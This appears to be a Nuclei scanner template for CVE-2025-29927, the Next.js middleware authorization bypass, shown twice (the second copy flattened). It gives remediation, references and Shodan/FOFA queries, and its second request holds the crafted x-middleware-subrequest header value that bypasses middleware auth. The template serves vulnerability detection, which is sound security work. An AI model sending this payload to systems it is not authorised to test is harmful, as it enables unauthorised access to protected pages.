ricardojba · March 25, 2025 19:37
diff --git a/CVE-2025-29927.yaml b/CVE-2025-29927.yaml
 id: CVE-2025-29927

 info:
  name: Next.js Middleware Auth Bypass
  author: vibrio
  severity: critical
  description: |
    Next.js contains a critical middleware bypass vulnerability affecting versions 11.1.4 through 15.2.2.
    The vulnerability allows attackers to bypass middleware security controls by sending a specially crafted
    'x-middleware-subrequest' header, which can lead to authorization bypass and other security controls circumvention.
  reference:
    - https://www.assetnote.io/resources/research/doing-the-due-diligence-analyzing-the-next-js-middleware-bypass-cve-2025-29927 **(best link)**
    - https://slcyber.io/assetnote-security-research-center/doing-the-due-diligence-analysing-the-next-js-middleware-bypass-cve-2025-29927/
    - https://zhero-web-sec.github.io/research-and-things/nextjs-and-the-corrupt-middleware
    - https://projectdiscovery.io/blog/nextjs-middleware-authorization-bypass
    - https://github.com/6mile/nextjs-CVE-2025-29927
    - https://nextjs.org/blog/cve-2025-29927
    - https://www.runzero.com/blog/next-js/
    - https://github.com/vercel/next.js/security/advisories/GHSA-f82v-jwr5-mffw
  remediation: |
    Upgrade to Next.js 13.5.9, 14.2.25 or 15.2.3 or later.
    If upgrading is not possible, block the x-middleware-subrequest header at the WAF or server level.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cwe-id: CWE-287
  metadata:
    max-request: 1
    shodan-query: x-middleware-rewrite
    fofa-query: x-middleware-rewrite
    product: next.js
    vendor: zeit
  tags: cve,cve2025,nextjs,auth-bypass,authbypass,login,panel

 flow: http(1) && http(2)

 http:

  - method: GET
    path:
      - "{{BaseURL}}"
    headers:
      x-nextjs-data: 1
    matchers-condition: and
    matchers:
      - type: word
        name: Next.js Middleware Auth Detected
        part: header
        words:
          - 'x-middleware-rewrite: /login'
          - 'x-nextjs-rewrite: /login'
          - 'x-nextjs-matched-path: /login'
          - 'x-nextjs-redirect: /login'
          - 'x-middleware-rewrite: /dashboard'
          - 'x-nextjs-rewrite: /dashboard'
          - 'x-nextjs-matched-path: /dashboard'
          - 'x-nextjs-redirect: /dashboard'
        condition: or
        case-insensitive: true
        internal: true
      - type: status
        status:
          - 200
          - 307
        condition: or
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}"
    headers:
      x-nextjs-data: 1
      x-middleware-subrequest: "src/middleware:nowaf:src/middleware:src/middleware:src/middleware:src/middleware:middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware"
    matchers:
      - type: status
        name: Next.js Middleware Auth Bypass
        status:
          - 200
	id: CVE-2025-29927

	info:
	name: Next.js Middleware Auth Bypass
	author: vibrio
	severity: critical
	description: \|
	Next.js contains a critical middleware bypass vulnerability affecting versions 11.1.4 through 15.2.2.
	The vulnerability allows attackers to bypass middleware security controls by sending a specially crafted
	'x-middleware-subrequest' header, which can lead to authorization bypass and other security controls circumvention.
	reference:
	- https://www.assetnote.io/resources/research/doing-the-due-diligence-analyzing-the-next-js-middleware-bypass-cve-2025-29927 (best link)
	- https://slcyber.io/assetnote-security-research-center/doing-the-due-diligence-analysing-the-next-js-middleware-bypass-cve-2025-29927/
	- https://zhero-web-sec.github.io/research-and-things/nextjs-and-the-corrupt-middleware
	- https://projectdiscovery.io/blog/nextjs-middleware-authorization-bypass
	- https://github.com/6mile/nextjs-CVE-2025-29927
	- https://nextjs.org/blog/cve-2025-29927
	- https://www.runzero.com/blog/next-js/
	- https://github.com/vercel/next.js/security/advisories/GHSA-f82v-jwr5-mffw
	remediation: \|
	Upgrade to Next.js 13.5.9, 14.2.25 or 15.2.3 or later.
	If upgrading is not possible, block the x-middleware-subrequest header at the WAF or server level.
	classification:
	cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
	cvss-score: 9.1
	cwe-id: CWE-287
	metadata:
	max-request: 1
	shodan-query: x-middleware-rewrite
	fofa-query: x-middleware-rewrite
	product: next.js
	vendor: zeit
	tags: cve,cve2025,nextjs,auth-bypass,authbypass,login,panel

	flow: http(1) && http(2)

	http:

	- method: GET
	path:
	- "{{BaseURL}}"
	headers:
	x-nextjs-data: 1
	matchers-condition: and
	matchers:
	- type: word
	name: Next.js Middleware Auth Detected
	part: header
	words:
	- 'x-middleware-rewrite: /login'
	- 'x-nextjs-rewrite: /login'
	- 'x-nextjs-matched-path: /login'
	- 'x-nextjs-redirect: /login'
	- 'x-middleware-rewrite: /dashboard'
	- 'x-nextjs-rewrite: /dashboard'
	- 'x-nextjs-matched-path: /dashboard'
	- 'x-nextjs-redirect: /dashboard'
	condition: or
	case-insensitive: true
	internal: true
	- type: status
	status:
	- 200
	- 307
	condition: or
	internal: true

	- method: GET
	path:
	- "{{BaseURL}}"
	headers:
	x-nextjs-data: 1
	x-middleware-subrequest: "src/middleware:nowaf:src/middleware:src/middleware:src/middleware:src/middleware:middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware"
	matchers:
	- type: status
	name: Next.js Middleware Auth Bypass
	status:
	- 200